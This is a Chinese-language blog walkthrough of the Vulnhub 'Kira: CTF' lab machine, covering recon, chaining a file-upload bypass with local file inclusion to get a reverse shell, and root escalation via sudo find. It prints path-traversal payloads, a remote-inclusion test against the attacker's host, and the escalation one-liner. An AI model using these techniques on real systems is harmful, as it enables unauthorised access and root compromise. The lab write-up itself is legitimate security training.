标签：26 KiraCTF bassam 2020 usr sbin 靶机 root Vulnhub

KiraCTF

作者： jason_huawen

靶机基本信息

名称：Kira: CTF

地址：

https://www.vulnhub.com/entry/kira-ctf,594/

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.75.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                            
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:f8:97:75      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.223  08:00:27:a6:c7:86      2     120  PCS Systemtechnik GmbH

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.223

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.223 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 05:55 EST
Nmap scan report for localhost (192.168.56.223)
Host is up (0.000073s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:A6:C7:86 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

NMAP扫描结果表明目标主机有1个开放端口80(HTTP)

Get Access

访问80端口，发现是个文件上传的页面，用图片测试上传功能，可以正常上传，而且文件上传位置在/uploads目录

然后直接上传shell.php，返回错误信息：File is not image

尝试第一种绕过：用burpsuite截获请求，修改Content-type为image/jpeg，返回同样的错误信息。

尝试第二种绕过：在shell.php头部添加GIF89a; 返回同样的错误信息

另外首页页面含有language链接，访问该链接，似乎有本地文件包含漏洞，确认一下：

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
bassam:x:1000:1000:Bassam,,,:/home/bassam:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

目标主机确实存在本地文件包含漏洞，那看一下是否有私钥可以先下载到本地

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=../../../../../../../home/bassam/.ssh/id_rsa
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

既然存在LFI，那看下是否存在远程文件包含漏洞，以便获得shell

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ curl http://192.168.56.223/language.php?lang=http://192.168.56.206:8000/test.txt         
<!DOCTYPE html>
<html>
<head>
        <title>LFI</title>
</head>
<body>
<input type="submit" value="language" 
    onclick="window.location='/language.php?lang=en.php';" />  
</form>
</body>
</html>

经过测试，不能实现远程文件包含。

看了一下其他人的解决方法是，需要结合两种漏洞，即文件上传以及本地文件包含漏洞

将shell.php改名称为shell2.php.jpeg,然后用本地文件包含漏洞去读取这个文件

从而拿到shell

http://192.168.56.223/language.php?lang=../../../../../../../var/www/html/uploads/shell2.php.jpeg

┌──(kali㉿kali)-[~/Vulnhub/KiraCTF]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.223] 45524
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 14:55:20 up  1:07,  1 user,  load average: 0.06, 0.05, 0.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bassam   :0       :0               13:47   ?xdm?  23.94s  0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/$ ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swapfile  usr
www-data@bassam-aziz:/$ cd /home
cd /home
www-data@bassam-aziz:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K ما� 26  2020 .
drwxr-xr-x 24 root   root   4.0K ما� 26  2020 ..
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 bassam
www-data@bassam-aziz:/home$ cd bassam
cd bassam
www-data@bassam-aziz:/home/bassam$ ls -alh
ls -alh
total 116K
drwxr-xr-x 16 bassam bassam 4.0K نو� 26 13:48 .
drwxr-xr-x  3 root   root   4.0K ما� 26  2020 ..
-rw-------  1 bassam bassam 1.7K نو� 26 13:47 .ICEauthority
-rw-------  1 bassam bassam    0 نو�  4  2020 .bash_history
-rw-r--r--  1 bassam bassam  220 ما� 26  2020 .bash_logout
-rw-r--r--  1 bassam bassam 3.7K ما� 26  2020 .bashrc
drwx------ 13 bassam bassam 4.0K ما� 26  2020 .cache
drwx------ 11 bassam bassam 4.0K ما� 26  2020 .config
drwx------  3 bassam bassam 4.0K ما� 26  2020 .gnupg
drwx------  3 bassam bassam 4.0K ما� 26  2020 .local
drwx------  5 bassam bassam 4.0K ما� 26  2020 .mozilla
-rw-r--r--  1 bassam bassam  807 ما� 26  2020 .profile
-rw-r--r--  1 root   root     66 ما� 26  2020 .selected_editor
drwx------  2 bassam bassam 4.0K ما� 26  2020 .ssh
-rw-r--r--  1 bassam bassam    0 ما� 26  2020 .sudo_as_admin_successful
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-clipboard.pid
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-display.pid
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-draganddrop.pid
-rw-r-----  1 bassam bassam    5 نو� 26 13:47 .vboxclient-seamless.pid
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Desktop
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Documents
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Downloads
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Music
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Pictures
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Public
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Templates
drwxr-xr-x  2 bassam bassam 4.0K ما� 26  2020 Videos
-rw-r--r--  1 bassam bassam 8.8K ما� 26  2020 examples.desktop
-rw-------  1 bassam bassam   32 نو�  4  2020 user.txt
www-data@bassam-aziz:/home/bassam$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@bassam-aziz:/home/bassam$

提权

www-data@bassam-aziz:/var/www$ cd html
cd html
www-data@bassam-aziz:/var/www/html$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 root root 4.0K ما� 26  2020 .
drwxr-xr-x 3 root root 4.0K ما� 26  2020 ..
-rw-r--r-- 1 root root  163 ما� 26  2020 index.html
-rw-r--r-- 1 root root  287 ما� 26  2020 language.php
drwxr-xr-x 2 root root 4.0K نو�  4  2020 supersecret-for-aziz
-rw-r--r-- 1 root root  747 ما� 26  2020 upload.php
drwxrwxrwx 2 root root 4.0K نو� 26 14:48 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K نو�  4  2020 .
drwxr-xr-x 4 root root 4.0K ما� 26  2020 ..
-rw-r--r-- 1 root root   15 نو�  4  2020 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
cat bassam-pass.txt
Password123!@#
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su - bassam
su - bassam
Password: Password123!@#

bassam@bassam-aziz:~$ id
id
uid=1000(bassam) gid=1000(bassam) groups=1000(bassam),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
bassam@bassam-aziz:~$ sudo -l
sudo -l
[sudo] password for bassam: Password123!@#

Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------  4 root root 4.0K نوفمب  4  2020 .
drwxr-xr-x 24 root root 4.0K مارس  26  2020 ..
-rw-r--r--  1 root root 3.1K أبريل  9  2018 .bashrc
drwx------  2 root root 4.0K فبراي  3  2020 .cache
-rw-r--r--  1 root root   43 نوفمب  4  2020 flag.txt
-rw-r--r--  1 root root 1.0K نوفمب  4  2020 .fl.swp
drwxr-xr-x  3 root root 4.0K مارس  26  2020 .local
-rw-r--r--  1 root root  148 أغسطس 17  2015 .profile
-rw-r-----  1 root root    5 نوفمب 26 13:47 .vboxclient-display-svga.pid
# cat flag.txt
cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}
#

提权成功!

经验教训

其实这里的文件上传很好绕过，只需要加上扩展名.jpeg即可，但是如果直接访问该文件，会认为是图片，有错误的图片，而不能拿到shell
结合本地文件包含漏洞，读取图片文件（其实就是shell.php)，从而拿到shell

标签：26,KiraCTF,bassam,2020,usr,sbin,靶机,root,Vulnhub
From： https://www.cnblogs.com/jason-huawen/p/16928203.html

Vulnhub之KiraCTF靶机解题过程